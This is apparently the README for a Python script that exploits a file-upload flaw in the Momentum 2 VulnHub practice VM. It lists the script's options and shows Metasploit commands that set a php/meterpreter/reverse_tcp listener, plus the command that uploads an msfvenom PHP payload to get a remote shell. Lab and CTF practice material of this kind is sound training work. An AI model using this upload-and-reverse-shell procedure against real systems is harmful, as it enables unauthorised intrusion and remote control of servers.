Momentum 2 - File Upload Exploit

A File Upload exploit-ish for the same vulnerability in the Momentum 2 Vulnhub VM. Credits to AL1ENUM for creating the VM, which you can find here.

General Usage

python3 m2upload.py [-h] -t ip_addr -pl /path/to/payload.php [-ua user_agent] [-sku] [-dbg]

Options

• -h, --help: show this help message and exit
• -t: ip address of the target momentum 2 vm.
• -pl: php (or other) payload to upload.
• -ua: custom user agent to use in the request.
• -sku: skip upload (ie. payload alread uploaded).
• -dbg: enable debugging.

Hint: The default -ua option's value is hard-coded into the script (b.t.w the option is not necessary, but hey...).

Example

Assuming you have already generated your payload (ie. owl.php, with a tool like msfvenom.

Running a listener

msf> use multi/handler
msf> set PAYLOAD php/meterpreter/reverse_tcp
msf> set LHOST 192.168.56.138
msf> set LPORT 1234
msf> run

Running exploit script

python3 ./m2upload.py -t 192.168.56.138 -pl owl.php

(enter 'run' or 'quit')
cmd~$ run